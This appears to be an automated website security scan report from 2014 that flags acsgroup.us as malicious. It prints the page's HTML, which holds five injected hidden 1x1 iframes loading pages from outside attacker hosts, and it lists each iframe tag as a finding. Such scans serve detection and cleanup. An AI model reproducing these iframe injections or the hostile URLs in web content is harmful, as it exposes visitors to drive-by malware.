Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=acsgroup.us
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://acsgroup.us/ | HTTP/1.1 200 OK Date: Thu, 28 Aug 2014 21:46:30 GMT Accept-Ranges: bytes ETag: "b0a74ef9b988cf1:4a18e" Server: Microsoft-IIS/6.0 Content-Length: 2762 Content-Location: http://acsgroup.us/index.html Content-Type: text/html Last-Modified: Sun, 15 Jun 2014 16:50:55 GMT X-Powered-By: win.onnetsecure.net X-Powered-By: ASP.NET | clean |
http://acsgroup.us/index.html | 200 OK Content-Length: 2762 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 119.59.84.51 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html> <head> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <title>Parallels H-Sphere acsgroup.us</title><iframe src="http://gamedev.raconsultants.net/ok.php" width="1" height="1"></iframe><iframe src="http://119.59.84.51/rotator/scripts/wow.html" width="1" height="1"></iframe><iframe src="http://119.59.84.51/java.php" width="1" height="1"></iframe><iframe src="http://119.59.84.51/go.php" width="1" height="1"></iframe><iframe src="http://news.adsabouts.ir/go.php" width="1" height="1"></iframe> body { height: 100%; background-color: #F9F8F8; margin: 0px; padding:0px; ...[2199 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://119.59.84.51/java.php This URL is marked by Google as suspicious <iframe src="http://119.59.84.51/java.php" width="1" height="1"> Hidden iFrame found. size: 1x1 src: http://gamedev.raconsultants.net/ok.php <iframe src="http://gamedev.raconsultants.net/ok.php" width="1" height="1"> Malicious iFrame found. size: 1x1 src: http://119.59.84.51/rotator/scripts/wow.html This URL is marked by Google as suspicious <iframe src="http://119.59.84.51/rotator/scripts/wow.html" width="1" height="1"> Hidden iFrame found. size: 1x1 src: http://news.adsabouts.ir/go.php <iframe src="http://news.adsabouts.ir/go.php" width="1" height="1"> Malicious iFrame found. size: 1x1 src: http://119.59.84.51/go.php This URL is marked by Google as suspicious <iframe src="http://119.59.84.51/go.php" width="1" height="1"> | ||
http://acsgroup.us/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: acsgroup.us
Result:
HTTP/1.1 200 OK
Date: Thu, 28 Aug 2014 21:46:30 GMT
Accept-Ranges: bytes
ETag: "b0a74ef9b988cf1:4a18e"
Server: Microsoft-IIS/6.0
Content-Length: 2762
Content-Location: http://acsgroup.us/index.html
Content-Type: text/html
Last-Modified: Sun, 15 Jun 2014 16:50:55 GMT
X-Powered-By: win.onnetsecure.net
X-Powered-By: ASP.NET
...2762 bytes of data.
GET / HTTP/1.1
Host: acsgroup.us
Result:
HTTP/1.1 200 OK
Date: Thu, 28 Aug 2014 21:46:30 GMT
Accept-Ranges: bytes
ETag: "b0a74ef9b988cf1:4a18e"
Server: Microsoft-IIS/6.0
Content-Length: 2762
Content-Location: http://acsgroup.us/index.html
Content-Type: text/html
Last-Modified: Sun, 15 Jun 2014 16:50:55 GMT
X-Powered-By: win.onnetsecure.net
X-Powered-By: ASP.NET
...2762 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: acsgroup.us
Referer: http://www.google.com/search?q=acsgroup.us
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: acsgroup.us
Referer: http://www.google.com/search?q=acsgroup.us
Result:
The result is similar to the first query. There are no suspicious redirects found.